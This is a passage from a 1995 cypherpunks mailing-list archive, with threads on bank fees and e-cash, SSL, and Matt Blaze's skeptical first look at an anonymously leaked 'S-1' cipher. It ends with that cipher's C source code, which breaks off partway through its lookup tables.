Bob gets a mailing a week later telling him of the advantages of 
his bank's newest "overdraft insurance" program.  $150 a year.

Bob, for what would literally be a series of very responsible 
transactions, is looking at over $215.00 in bank fees, and at 
least $150 in bounced check fees from vendors because of violation 
of technical rules the bank has designed to cause fees to be 
charged.

- - - E-Cash

I cannot believe that e-cash won't be able to solve some of these 
problems, and I hope it will limit its own fees to usage.  To me 
this is a classic argument for small house e-cash shops.  Citibank 
and Mastercard are going to fight for their fees.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMClJUS1onm9OaF05AQEhugf/T2FquzHdEhHp8dQI5FRYcuayTusig1F3
pHejUdry84F1MqLArSZukVGxEWtZVR0qh2xq4AiN/UwlW9ZKasFdbPPGJtbD6gpO
aALJIhQaYJSTQkW4fmieejhcNPMf7e59YaerOl83LkKS/+1tFi9ib1Xz2ZnmXlph
0mWuJjONzH45tPylyJy8fyB9nrpk5WDCAiLhUSxqHRdVmA9nq6uIIZbdmz7sEpLq
82cHyHXKeufGKGvx26R4z3lu0o5Ykd/dGAWADpJ6OT2bhlWFinApF/HMJAA9mLvi
w70StZZL/94ncQQWF7LU5vMhGu7/5WNsrpRTzZXG5A0EfFL0ZAdYPw==
=ew58
-----END PGP SIGNATURE-----


00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@telecheck.com
Date: Wed, 9 Aug 95 17:05:47 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: Bank Fees and E-Cash
In-Reply-To: <Pine.SUN.3.91.950809190129.17834A-100000@access5.digex.net>
Message-ID: <9508100004.AA03734@TeleCheck.com>
MIME-Version: 1.0
Content-Type: text/plain



I have no love for most banks, and have experienced your senario on at
least two seperate times...  In fact, I tried to deposit a cashiers
check from another bank to open a CD in one bank, and they had to "hold"
the check for one week.  I can imagine holding it so I don't start
forging checks on a forged cashiers check, but on a 30 day CD?  Ugh.

unicorn@access.digex.net said:
> Banks have gorged themselves on rocketing fees for the last five  
> years.  The result is that typical bank customer currently pays  150% 
> of the amount of interest collected on accounts in a given  year in 
> the form of fees.  My prediction, and my hope, is that e- cash will 
> cut through the pretense upon which the rationalization  of many of 
> these fees is based, and even market itself on this  point- Lower 
> Fees. 

My bank charges me a flat rate of $2/month +$1/month for producing
an image copy of my checks.  It took me a while to find it, but I
did.  Its called shopping.

<snip>

unicorn@access.digex.net said:
> Telecheck will have Bob on the 10 most wanted list for $350.00 in  
> bounced checks.  Bob's check writing ability is about nil in D.C.  
> for the month it will take him to clear it up. 

Not to pick nits, but TeleCheck probably won't get involved until
1-2 months after the checks were bounced (UNLESS the checks are reported
stolen, then we will attempt to shut you down), and usually only if the 
merchants were guarantee customers (we will pay the merchant for
a bad check he/she accepts based on a TeleCheck approval).  Furthermore,
if you write a bad check on a customer of SCAN (TeleCheck's evil
competitor), we won't think twice about you.  

Secondly, most banks will automatically resubmit checks several
times to cover temporary short falls.

unicorn@access.digex.net said:
> I cannot believe that e-cash won't be able to solve some of these  
> problems, and I hope it will limit its own fees to usage.  To me  
> this is a classic argument for small house e-cash shops.  Citibank  
> and Mastercard are going to fight for their fees. 

Unfortunately, what most people term e-cash isn't e-cash.  The problems
associated with bringing up the electronic equivalent of cash are
gigantic.  I for one, have a new found respect for Chaum and the rest of
the pioneers in the field.

Citibank and MasterCard are developing an "internet" ways for you to use 
your credit cards, not e-cash.  Microsoft is developing ways to pipe that
information to them.  These are not going to solve the problem, especially
at 18.9% A.P.R...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jason Burrell" <jburrell@crl.com>
Date: Wed, 9 Aug 95 17:33:12 PDT
To: merriman@arn.net (David K. Merriman)
Subject: Re: How To Spot a Spook page
In-Reply-To: <199508090550.AAA07775@arnet.arn.net>
Message-ID: <199508100020.TAA02354@crl.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> As a start on a Web page, here are some things I thought of. What else? What
> are the initials of some of the world's intelligence groups (CIA, NSA, KGB,
> DGI, MI5(?), ???)
> 
> 1> Antennas - more than TV/Ham/CB/Satellite (or 'unusually' shaped antennas).

Well, no, but I do have access to a lot of computer equipment(*) and some 
'unusual' connectivity software floating around.

* - The 'good' powered stuff isn't here; just this thing that runs like a
486/10 on valium.

> 2> No, or *very* few, visitors (esp. kids)

I seldom have any visitors to speak of here.

> 3> Visitors are seldom the same, or almost always the same.

That describes me perfectly.

> 4> Doesn't talk about job/company.

I don't.

> 5> Activity at 'unusual' times.

The times for much of my activity could be described as quite unusual.

> 6> Not very 'sociable' (keep to themselves).

That's definately me. Ask anyone who knows me.

> Or, tell me to forget it, it doesn't belong here.... :-/
> 
> Dave

I guess this proves I'm a spook. My friends probably suspected as much... :-)

You know, now that I think about it, I probably *am* quite "mysterious" 
to the great majority of people who know of me personally (off-net), for a 
variety of reasons.

--
PGP public key available via finger.	      
GCS/M/S d>++ s: a--- C++++ UL++++ P+ L++++ E- W+(++) N+++ 
K+++ w--- O- M-- V-- PS+++ PE+ Y++ PGP++(+++) t 5+++ X+ 
R+++ tv+ b+ DI(+) D G+++ e>+++++ h+ r y?



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Wed, 9 Aug 95 16:49:53 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Crypto = Competitive Advantage?
In-Reply-To: <199508091417.KAA17510@panix.com>
Message-ID: <TAA08200.199508092349@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <199508091417.KAA17510@panix.com>, Duncan Frissell writes:
>Note to Mr. Bill -
>
>I was watching CNBC this morning while reading my mail and they had a story
>on the Netscape Communications IPO (ticker NSCP btw).  Some analyst said
>when asked whether Microsoft couldn't just wipe them out that the most
>important part of Netscape's product was that it offered end-to-end
>encryption.  He said that this was important for the growth of the nets and
>was something that people wanted.
[...]

He may or may not be right that end-to-end encryption is important, but:

(a) Netscape has documented exactly how SSL should work, and
(b) Microsoft can licence RC4 and RSA from PKP just as well as
Netscape can.

In addition it is far from clear that SSL will be the winning 
end-to-end encryption in the web world ('tho it looks that way
at the moment - a few well publicised attacks - say one agenst
the 40bit keys, and say a man-in-the-middle may make S-HTTP, or
PGP-HTTP look alot better then SSL to the public - or it may not).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Wed, 9 Aug 95 16:51:42 PDT
To: cypherpunks@toad.com
Subject: Re: "S1" encryption system (was: this looked like it might be interesting)
In-Reply-To: <199508092259.PAA10092@jobe.shell.portal.com>
Message-ID: <199508100000.UAA07792@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:
>I suppose the unstated implication is that this might be Skipjack.
>
>I have looked at the program a bit and have a few observations:
>
....
>The encryption function itself is a modified Feistel type cipher, with
>the blocks broken into 8 pieces and xor'd with functions involving F,
...

Someone sent me (to my bell labs address) a copy of this this afternoon via
an anon server in the netherlands.  It looks like others got it as well, and
it appears to have been posted to the cypherpunks list, though it hasn't
yet shown up here from the list (my mail seems to be slow today).  Did
anyone else have a copy mailed directly to them?

I don't quite know what to make of it.  A couple of random quick first-order
observations:

	The code appears to have been translated from some other
	language by someone not skilled in C.  Hal noted the
	lack of "for" loops where they are obviously called for,
	and at least two odd bits of code that appear to be bugs,
	at least one of which one would suspect would cause it to
	fail to interoperate with correct implementations (if we
	are to assume the "correct" cipher uses the entire key schedule).
	Also note the awkward assignement to the F and G tables.

	S1 could suggest Skipjack, but it is also a pretty generic name
	for a cryptosystem.

	I thought Skipjack (like most other NSA cryptosystems) is SECRET,
	not TOP SECRET, but on the other hand this appears to be part of
	some kind of "secondary analysis" package, whatever that is, so
	if this is really spook stuff, the TOP SECRET designation could
	be reasonable.

	The cipher is similar in some ways to one designed by Bruce
	Schneier and I last year (MacGuffin, described in
	ftp://research.att.com/dist/mab/mcg.ps ).  In particular, note
	that in each of the 32 rounds, 16 bits are operated on by 48
	(or 40, depending on the effect of the G function).

	There is at least one novel feature - the G function used to
	select which F's (Sboxes) to use.  I've not seen this before.

	The cipher appears to be designed for software implementation
	(byte oriented, etc.).  The software, on the the other hand,
	goes to some trouble to emulate a hardware interface, as if it
	were written to be dropped in to some pre-existing code or
	library.

	The F outputs are not uniformly distributed.  In fact, some outputs
	appear far more often than others (I base this on running "grep|wc",
	not on any real analysis.)

	What a strange key schedule.

	The "family" XOR business at the begining and end suggests
	RSA's DESX.  The lanuage in the comments suggests that it's there
	to allow for non-interoperable "families" of users.  GOST
	has similar features, though GOST couples this more closely to
	the cipher's internal structure.

	As far as I know, no one has EVER leaked TOP SECRET material
	cryptosystem in this way, so I'm very skeptical.  But there's
	always a first time.

I don't know what to believe.  If this is a real, classified cryptosystem,
it would be a very unusual first.  On the other hand, if this is a hoax,
whoever did it appears to have gone to some trouble, and has included some
interesting design features.  A third possibility, if we are to believe
the spook markings, is that it is a re-implementation of someone else's
cryptosystem, created for the purpose of cryptanlysis.

All in all, I remain very skeptical.  It smells like a hoax to me, but
I'm willing to look at it with an open mind.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 9 Aug 95 11:55:31 PDT
To: cypherpunks@toad.com
Subject: this looked like it might be interesting
Message-ID: <199508091852.UAA23821@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


it was on a floppy i got in the mail last week:

/* TOP SECRET                                                    */
/* See label file for codeword restrictions                      */

/*****************************************************************/
/* TOP SECRET                                                    */
/* See label file for codeword restrictions                      */
/*                                                               */
/* S-1 CIPHER ALGORITHM software chip simulator                  */
/*                                                               */
/* NOT INTENDED FOR EXTERNAL, PRODUCTION, OR CONTRACTOR USE OR   */
/* DISCLOSURE.                                                   */
/* NOT CERTIFIED OR APPROVED FOR USE AS REFERENCE.               */
/* FOR SECONDARY ANALYTIC USE ONLY.                              */
/*                                                               */
/* Basic chip functions. Block encryption methods are not        */
/* implemented.                                                  */
/*                                                               */
/* SOFTWARE HISTORY:                                             */
/* 1 FEBRUARY 1989 --- Submitted to source control.              */
/* 31 JULY 1991 --- Moved UFV support into basic functions.      */
/*                                                               */
/* TOP SECRET                                                    */
/* See label file for codeword restrictions                      */
/*****************************************************************/


/* local declarations are for ANSI C */
#include <stdio.h>
#include <sys/types.h>

/* S-1 F table - these differ in the S-2 version */
static u_char F[4][256];
/* S-1 F selection (G) table */
static u_char G[2][256];

/* exported interface */

int S1_self_check(void);
int S1_zeroize(void);
int S1_load_key(int, u_char *);
int S1_encrypt_block(int, u_char *);
int S1_decrypt_block(int, u_char *);
int S1_create_key(u_char *, u_char *);


/* local functions */
static void f_initialize(void);
static void rotatekey(int, u_char *);
static u_char f(int,int);
static u_char g(int,int);


/* CHIP PARAMETERS */

#define KEYGEN_CHIP 1 /* delete this to simulate operational chipsets */
#define KEY_REGISTERS 4
#define INTEGRITY KEY_REGISTERS

/* user family vectors (UFV) */
static u_char clear_family[8] = {129,3,5,7,2,4,6,131};
static u_char cipher_family[8] = {1,254,253,252,128,129,130,8};

static u_char key_integrity_key[10] = {0,0,0,0,0,0,0,0,0,0};

static u_char key[KEY_REGISTERS+1][10];
static u_char fullkey[KEY_REGISTERS+1][32][6];  /* SOFTWARE ONLY */

static int initialized=0;

/* EXPORTED SIMULATED CHIP INTERFACE */
/* SEE NOTES FOR INTERFACE DESCRIPTIONS */


int S1_self_check()
{
	f_initialize();
	rotatekey(INTEGRITY,key_integrity_key);
	initialized=1;
	return 0;
}


int S1_zeroize()
{
	int i, j, k;

	i=0;
	while (i<KEY_REGISTERS+1) {
		j=0;
		while (j<10) {
			key[i][j] = 0;
			j=j+1;
		}
		j=0;
		while (j<32) {
			k=0;
			while (k<6) {
				fullkey[i][j][k] = 0;
				k++;
			}
			j=j+1;
		}
		i=i+1;
	}
	i=0;
	while (i<4) {
		j=0;
		while (j<256) {
			F[i][j] = 0;
			j++;
		}
		i++;
	}
	return 0;
}
	


int S1_load_key(int key_register, u_char *key_vector)
{
	u_char key_buffer[12];
	
	if (initialized == 0)
		return 1;
	if ((key_register < 0) || (key_register >= KEY_REGISTERS))
		return 9;
	memcpy(key_buffer,key_vector,12);
	S1_decrypt_block(INTEGRITY,key_buffer);
	S1_decrypt_block(INTEGRITY,key_buffer+4);
	if ((key_buffer[10] != 0) || (key_buffer[11] != 0))
		return 2;
	rotatekey(key_register,key_buffer);
	memcpy(key[key_register],key_buffer,10);
	return 0;
}


int S1_encrypt_block(int key_register, u_char *block)
{
	int r, startf, i;
	
	if (initialized == 0)
		return 1;
	i=0;
	while (i<8) {
		block[i] = block[i] ^ clear_family[i];
		i=i+1;
	}
	i=0;
	while (i<32) {
		r=i*2;
		startf = g(0,fullkey[key_register][r][0] ^ block[(r+4) % 8])
		       + g(1,fullkey[key_register][r][1] ^ block[(r+5) % 8])*2;
		block[(r+6) % 8] = block[(r+6) % 8]
			       ^ f(((startf+0) % 4),
				   fullkey[key_register][r][2]
				 ^ block[(r+2) % 8]);
		block[(r+6) % 8] = block[(r+6) % 8]
			       ^ (f(((startf+1) % 4),
				   fullkey[key_register][r][3]
				 ^ block[(r+3) % 8]) << 4);	
		block[(r+7) % 8] = block[(r+7) % 8]
			       ^ f(((startf+2) % 4),
				   fullkey[key_register][r][4]
				 ^ block[(r+0) % 8]);
		block[(r+7) % 8] = block[(r+7) % 8]
			       ^ (f(((startf+3) % 4),
				   fullkey[key_register][r][5]
				 ^ block[(r+1) % 8]) << 4);
		i = i+1;
	}
	i=0;
	while (i<8) {
		block[i] = block[i] ^ cipher_family[i];
		i=i+1;
	}
	return 0;
}


int S1_decrypt_block(int key_register, u_char *block)
{
	int r, startf, i;
	
	if (initialized == 0)
		return 1;
	i=0;
	while (i<8) {
		block[i] = block[i] ^ cipher_family[i];
		i=i+1;
	}
	i=32;
	while (i>0) {
		i = i-1;
		r=i*2;
		startf = g(0,fullkey[key_register][r][0] ^ block[(r+4) % 8])
		       + g(1,fullkey[key_register][r][1] ^ block[(r+5) % 8])*2;
		block[(r+6) % 8] = block[(r+6) % 8]
			       ^ f(((startf+0) % 4),
				   fullkey[key_register][r][2]
				 ^ block[(r+2) % 8]);
		block[(r+6) % 8] = block[(r+6) % 8]
			       ^ (f(((startf+1) % 4),
				   fullkey[key_register][r][3]
				 ^ block[(r+3) % 8]) << 4);	
		block[(r+7) % 8] = block[(r+7) % 8]
			       ^ f(((startf+2) % 4),
				   fullkey[key_register][r][4]
				 ^ block[(r+0) % 8]);
		block[(r+7) % 8] = block[(r+7) % 8]
			       ^ (f(((startf+3) % 4),
				   fullkey[key_register][r][5]
				 ^ block[(r+1) % 8]) << 4);
	}
	i=0;
	while (i<8) {
		block[i] = block[i] ^ clear_family[i];
		i=i+1;
	}
	return 0;
}


#ifdef KEYGEN_CHIP
/* WARNING: this feature is not implemented on all chip sets */
int S1_create_key(u_char *key_value, u_char *key_vector)
{
	if (initialized == 0)
		return 1;
	memcpy(key_vector,key_value,10);
	key_vector[10] = 0;
	key_vector[11] = 0;
	S1_encrypt_block(INTEGRITY,key_vector+4);
	S1_encrypt_block(INTEGRITY,key_vector);
	return 0;
}
#else
int S1_create_key(u_char *key_value, u_char *key_vector)
{
	return 7;
}
#endif


/* SUPPORT FUNCTIONS */


static void
rotatekey(int key_register, u_char *key_value)
{
	int i, j;
	int jshift[6] = {5, 8, 3, 1, 4, 0};

	key_register = key_register % KEY_REGISTERS;
	i=0;
	while (i<32) {
		j=0;
		while (j<6) {
			fullkey[key_register][i][j] =
			    f(0,(key_value[(i*6+j+jshift[j]) % 10]))
			  ^ f(1,(key_value[(i*6+j+jshift[(j+1)%6]) % 10]))
			  ^ (f(2,(key_value[(i*6+j+jshift[(j+2)%6]) % 10]))<<4)
			  ^ (f(3,(key_value[(i*6+j+jshift[(j+3)%6]) % 10]))<<4);
			j=j+1;
		}
		i=i+1;
	}
}

static void f_initialize() {
	/* NON-LINEAR (F0, F1, F2, F3) */
	F[0][0] = 07;
	F[0][1] = 02;
	F[0][2] = 011;
	F[0][3] = 014;
	F[0][4] = 010;
	F[0][5] = 016;
	F[0][6] = 01;
	F[0][7] = 06;
	F[0][8] = 015;
	F[0][9] = 02;
	F[0][10] = 00;
	F[0][11] = 04;
	F[0][12] = 017;
	F[0][13] = 07;
	F[0][14] = 03;
	F[0][15] = 017;
	F[0][16] = 010;
	F[0][17] = 017;
	F[0][18] = 012;
	F[0][19] = 05;
	F[0][20] = 013;
	F[0][21] = 00;
	F[0][22] = 017;
	F[0][23] = 02;
	F[0][24] = 05;
	F[0][25] = 015;
	F[0][26] = 017;
	F[0][27] = 017;
	F[0][28] = 011;
	F[0][29] = 011;
	F[0][30] = 06;
	F[0][31] = 014;
	F[0][32] = 07;
	F[0][33] = 017;
	F[0][34] = 012;
	F[0][35] = 016;
	F[0][36] = 012;
	F[0][37] = 06;
	F[0][38] = 04;
	F[0][39] = 04;
	F[0][40] = 014;
	F[0][41] = 04;
	F[0][42] = 017;
	F[0][43] = 013;
	F[0][44] = 03;
	F[0][45] = 014;
	F[0][46] = 014;
	F[0][47] = 06;
	F[0][48] = 06;
	F[0][49] = 00;
	F[0][50] = 02;
	F[0][51] = 010;
	F[0][52] = 012;
	F[0][53] = 012;
	F[0][54] = 03;
	F[0][55] = 015;
	F[0][56] = 013;
	F[0][57] = 014;
	F[0][58] = 017;
	F[0][59] = 05;
	F[0][60] = 05;
	F[0][61] = 00;
	F[0][62] = 07;
	F[0][63] = 014;
	F[0][64] = 016;
	F[0][65] = 011;
	F[0][66] = 03;
	F[0][67] = 011;
	F[0][68] = 010;
	F[0][69] = 014;
	F[0][70] = 012;
	F[0][71] = 014;
	F[0][72] = 017;
	F[0][73] = 05;
	F[0][74] = 07;
	F[0][75] = 05;
	F[0][76] = 07;
	F[0][77] = 016;
	F[0][78] = 03;
	F[0][79] = 02;
	F[0][80] = 011;
	F[0][81] = 014;
	F[0][82] = 04;
	F[0][83] = 00;
	F[0][84] = 010;
	F[0][85] = 016;
	F[0][86] = 02;
	F[0][87] = 03;
	F[0][88] = 02;
	F[0][89] = 016;
	F[0][90] = 013;
	F[0][91] = 04;
	F[0][92] = 010;
	F[0][93] = 01;
	F[0][94] = 06;
	F[0][95] = 013;
	F[0][96] = 016;
	F[0][97] = 010;
	F[0][98] = 017;
	F[0][99] = 014;
	F[0][100] = 00;
	F[0][101] = 02;
	F[0][102] = 00;
	F[0][103] = 01;
	F[0][104] = 01;
	F[0][105] = 013;
	F[0][106] = 016;
	F[0][107] = 00;
	F[0][108] = 02;
	F[0][109] = 013;
	F[0][110] = 017;
	F[0][111] = 013;
	F[0][112] = 016;
	F[0][113] = 016;
	F[0][114] = 02;
	F[0][115] = 05;
	F[0][116] = 02;
	F[0][117] = 00;
	F[0][118] = 016;
	F[0][119] = 01;
	F[0][120] = 010;
	F[0][121] = 013;
	F[0][122] = 011;
	F[0][123] = 06;
	F[0][124] = 01;
	F[0][125] = 05;
	F[0][126] = 07;
	F[0][127] = 07;
	F[0][128] = 016;
	F[0][129] = 014;
	F[0][130] = 012;
	F[0][131] = 011;
	F[0][132] = 011;
	F[0][133] = 016;
	F[0][134] = 07;
	F[0][135] = 014;
	F[0][136] = 011;
	F[0][137] = 015;
	F[0][138] = 012;
	F[0][139] = 00;
	F[0][140] = 010;
	F[0][141] = 00;
	F[0][142] = 07;
	F[0][143] = 012;
	F[0][144] = 015;
	F[0][145] = 013;
	F[0][146] = 00;
	F[0][147] = 012;
	F[0][148] = 04;
	F[0][149] = 017;
	F[0][150] = 05;
	F[0][151] = 00;
	F[0][152] = 015;
	F[0][153] = 02;
	F[0][154] = 016;
	F[0][155] = 03;
	F[0][156] = 03;
	F[0][157] = 013;
	F[0][158] = 06;
	F[0][159] = 011;
	F[0][160] = 014;
	F[0][161] = 03;
	F[0][162] = 017;
	F[0][163] = 014;
	F[0][164] = 00;
	F[0][165] = 013;
	F[0][166] = 06;
	F[0][167] = 017;
	F[0][168] = 010;
	F[0][169] = 015;
	F[0][170] = 01;
	F[0][171] = 012;
	F[0][172] = 05;
	F[0][173] = 010;
	F[0][174] = 06;
	F[0][175] = 07;
	F[0][176] = 06;
	F[0][177] = 03;
	F[0][178] = 017;
	F[0][179] = 06;
	F[0][180] = 015;
	F[0][181] = 015;
	F[0][182] = 01;
	F[0][183] = 013;
	F[0][184] = 04;
	F[0][185] = 012;
	F[0][186] = 03;
	F[0][187] = 00;
	F[0][188] = 06;
	F[0][189] = 011;
	F[0][190] = 011;
	F[0][191] = 015;
	F[0][192] = 012;
	F[0][193] = 017;
	F[0][194] = 016;
	F[0][195] = 01;
	F[0][196] = 015;
	F[0][197] = 016;
	F[0][198] = 017;
	F[0][199] = 04;
	F[0][200] = 015;
	F[0][201] = 06;
	F[0][202] = 07;
	F[0][203] = 04;
	F[0][204] = 00;
	F[0][205] = 017;
	F[0][206] = 016;
	F[0][207] = 017;
	F[0][208] = 010;
	F[0][209] = 02;
	F[0][210] = 04;
	F[0][211] = 012;
	F[0][212] = 01;
	F[0][213] = 02;
	F[0][214] = 011;
	F[0][215] = 07;
	F[0][216] = 010;
	F[0][217] = 010;
	F[0][218] = 02;
	F[0][219] = 02;
	F[0][220] = 07;
	F[0][221] = 010;
	F[0][222] = 010;
	F[0][223] = 013;
	F[0][224] = 03;
	F[0][225] = 016;
	F[0][226] = 017;
	F[0][227] = 011;
	F[0][228] = 06;
	F[0][229] = 011;
	F[0][230] = 00;
	F[0][231] = 017;
	F[0][232] = 014;
	F[0][233] = 06;
	F[0][234] = 04;
	F[0][235] = 02;
	F[0][236] = 03;
	F[0][237] = 00;
	F[0][238] = 011;
	F[0][239] = 013;
	F[0][240] = 014;
	F[0][241] = 05;
	F[0][242] = 03;
	F[0][243] = 016;
	F[0][244] = 013;
	F[0][245] = 017;
	F[0][246] = 04;
	F[0][247] = 05;
	F[0][248] = 017;
	F[0][249] = 011;
	F[0][250] = 03;
	F[0][251] = 06;
	F[0][252] = 010;
	F[0][253] = 013;
	F[0][254] = 014;
	F[0][255] = 06;
	F[1][0] = 017;
	F[1][1] = 06;
	F[1][2] = 016;
	F[1][3] = 015;
	F[1][4] = 012;
	F[1][5] = 07;
	F[1][6] = 07;
	F[1][7] = 03;
	F[1][8] = 03;
	F[1][9] = 01;
	F[1][10] = 017;
	F[1][11] = 00;
	F[1][12] = 013;
	F[1][13] = 07;
	F[1][14] = 02;
	F[1][15] = 010;
	F[1][16] = 01;
	F[1][17] = 014;
	F[1][18] = 012;
	F[1][19] = 01;
	F[1][20] = 07;
	F[1][21] = 03;
	F[1][22] = 01;
	F[1][23] = 016;
	F[1][24] = 014;
	F[1][25] = 011;
	F[1][26] = 00;
	F[1][27] = 01;
	F[1][28] = 06;
	F[1][29] = 02;
	F[1][30] = 011;
	F[1][31] = 013;
	F[1][32] = 014;
	F[1][33] = 011;
	F[1][34] = 07;
	F[1][35] = 012;
	F[1][36] = 03;
	F[1][37] = 03;
	F[1][38] = 010;
	F[1][39] = 00;
	F[1][40] = 00;
	F[1][41] = 012;
	F[1][42] = 04;
	F[1][43] = 00;
	F[1][44] = 02;
	F[1][45] = 017;
	F[1][46] = 015;
	F[1][47] = 013;
	F[1][48] = 02;
	F[1][49] = 017;
	F[1][50] = 05;
	F[1][51] = 04;
	F[1][52] = 03;
	F[1][53] = 013;
	F[1][54] = 017;
	F[1][55] = 03;
	F[1][56] = 011;
	F[1][57] = 012;
	F[1][58] = 01;
	F[1][59] = 011;
	F[1][60] = 07;
	F[1][61] = 011;
	F[1][62] = 011;
	F[1][63] = 010;
	F[1][64] = 01;
	F[1][65] = 05;
	F[1][66] = 02;
	F[1][67] = 03;
	F[1][68] = 010;
	F[1][69] = 017;
	F[1][70] = 07;
	F[1][71] = 012;
	F[1][72] = 015;
	F[1][73] = 011;
	F[1][74] = 010;
	F[1][75] = 017;
	F[1][76] = 03;
	F[1][77] = 016;
	F[1][78] = 03;
	F[1][79] = 015;
	F[1][80] = 011;
	F[1][81] = 013;
	F[1][82] = 05;
	F[1][83] = 07;
	F[1][84] = 017;
	F[1][85] = 012;
	F[1][86] = 012;
	F[1][87] = 07;
	F[1][88] = 017;
	F[1][89] = 05;
	F[1][90] = 07;
	F[1][91] = 00;
	F[1][92] = 04;
	F[1][93] = 04;
	F[1][94] = 04;
	F[1][95] = 06;
	F[1][96] = 011;
	F[1][97] = 04;
	F[1][98] = 07;
	F[1][99] = 010;
	F[1][100] = 010;
	F[1][101] = 015;
	F[1][102] = 017;
	F[1][103] = 00;
	F[1][104] = 012;
	F[1][105] = 02;
	F[1][106] = 01;
	F[1][107] = 016;
	F[1][108] = 00;
	F[1][109] = 05;
	F[1][110] = 03;
	F[1][111] = 011;
	F[1][112] = 05;
	F[1][113] = 014;
	F[1][114] = 011;
	F[1][115] = 00;
	F[1][116] = 011;
	F[1][117] = 00;
	F[1][118] = 013;
	F[1][119] = 010;
	F[1][120] = 016;
	F[1][121] = 014;
	F[1][122] = 04;
	F[1][123] = 03;
	F[1][124] = 015;
	F[1][125] = 016;
	F[1][126] = 02;
	F[1][127] = 03;
	F[1][128] = 012;
	F[1][129] = 06;
	F[1][130] = 017;
	F[1][131] = 00;
	F[1][132] = 011;
	F[1][133] = 011;
	F[1][134] = 02;
	F[1][135] = 017;
	F[1][136] = 013;
	F[1][137] = 04;
	F[1][138] = 07;
	F[1][139] = 02;
	F[1][140] = 02;
	F[1][141] = 014;
	F[1][142] = 04;
	F[1][143] = 07;
	F[1][144] = 014;
	F[1][145] = 01;
	F[1][146] = 00;
	F[1][147] = 03;
	F[1][148] = 01;
	F[1][149] = 010;
	F[1][150] = 01;
	F[1][151] = 07;
	F[1][152] = 012;
	F[1][153] = 00;
	F[1][154] = 015;
	F[1][155] = 04;
	F[1][156] = 00;
	F[1][157] = 017;
	F[1][158] = 04;
	F[1][159] = 00;
	F[1][160] = 017;
	F[1][161] = 014;
	F[1][162] = 04;
	F[1][163] = 07;
	F[1][164] = 013;
	F[1][165] = 011;
	F[1][166] = 012;
	F[1][167] = 017;
	F[1][168] = 017;
	F[1][169] = 03;
	F[1][170] = 07;
	F[1][171] = 00;
	F[1][172] = 04;
	F[1][173] = 07;
	F[1][174] = 07;
	F[1][175] = 03;
	F[1][176] = 05;
	F[1][177] = 06;
	F[1][178] = 017;
	F[1][179] = 03;
	F[1][180] = 017;
	F[1][181] = 02;
	F[1][182] = 04;
	F[1][183] = 017;
	F[1][184] = 00;
	F[1][185] = 014;
	F[1][186] = 017;
	F[1][187] = 04;
	F[1][188] = 05;
	F[1][189] = 016;
	F[1][190] = 015;
	F[1][191] = 04;
	F[1][192] = 012;
	F[1][193] = 013;
	F[1][194] = 00;
	F[1][195] = 04;
	F[1][196] = 017;
	F[1][197] = 07;
	F[1][198] = 013;
	F[1][199] = 04;
	F[1][200] = 010;
	F[1][201] = 05;
	F[1][202] = 07;
	F[1][203] = 04;
	F[1][204] = 013;
	F[1][205] = 05;
	F[1][206] = 016;
	F[1][207] = 010;
	F[1][208] = 015;
	F[1][209] = 00;
	F[1][210] = 04;
	F[1][211] = 04;
	F[1][212] = 017;
	F[1][213] = 010;
	F[1][214] = 05;
	F[1][215] = 015;
	F[1][216] = 011;
	F[1][217] = 01;
	F[1][218] = 012;
	F[1][219] = 013;
	F[1][220] = 015;
	F[1][221] = 03;
	F[1][222] = 010;
	F[1][223] = 05;
	F[1][224] = 07;
	F[1][225] = 06;
	F[1][226] = 00;
	F[1][227] = 02;
	F[1][228] = 011;
	F[1][229] = 06;
	F[1][230] = 00;
	F[1][231] = 017;
	F[1][232] = 01;
	F[1][233] = 010;
	F[1][234] = 03;
	F[1][235] = 06;
	F[1][236] = 05;
	F[1][237] = 010;
	F[1][238] = 010;
	F[1][239] = 012;
	F[1][240] = 014;
	F[1][241] = 02;
	F[1][242] = 02;
	F[1][243] = 02;
	F[1][244] = 010;
	F[1][245] = 04;
	F[1][246] = 013;
	F[1][247] = 07;
	F[1][248] = 016;
	F[1][249] = 015;
	F[1][250] = 05;
	F[1][251] = 017;
	F[1][252] = 05;
	F[1][253] = 03;
	F[1][254] = 010;
	F[1][255] = 010;
	F[2][0] = 013;
	F[2][1] = 011;
	F[2][2] = 017;
	F[2][3] = 07;
	F[2][4] = 01;
	F[2][5] = 012;
	F[2][6] = 00;
	F[2][7] = 011;
	F[2][8] = 06;
	F[2][9] = 010;
	F[2][10] = 012;
	F[2][11] = 014;
	F[2][12] = 00;
	F[2][13] = 012;
	F[2][14] = 01;
	F[2][15] = 012;
	F[2][16] = 011;
	F[2][17] = 014;
	F[2][18] = 05;
	F[2][19] = 05;
	F[2][20] = 07;
	F[2][21] = 04;
	F[2][22] = 013;
	F[2][23] = 015;
	F[2][24] = 04;
	F[2][25] = 00;
	F[2][26] = 01;
	F[2][27] = 010;
	F[2][28] = 017;
	F[2][29] = 02;
	F[2][30] = 015;
	F[2][31] = 012;
	F[2][32] = 06;
	F[2][33] = 00;
	F[2][34] = 07;
	F[2][35] = 017;
	F[2][36] = 014;
	F[2][37] = 013;
	F[2][38] = 011;
	F[2][39] = 03;
	F[2][40] = 07;
	F[2][41] = 013;
	F[2][42] = 06;
	F[2][43] = 05;
	F[2][44] = 011;
	F[2][45] = 010;
	F[2][46] = 00;
	F[2][47] = 02;
	F[2][48] = 07;
	F[2][49] = 011;
	F[2][50] = 016;
	F[2][51] = 01;
	F[2][52] = 012;
	F[2][53] = 014;
	F[2][54] = 012;
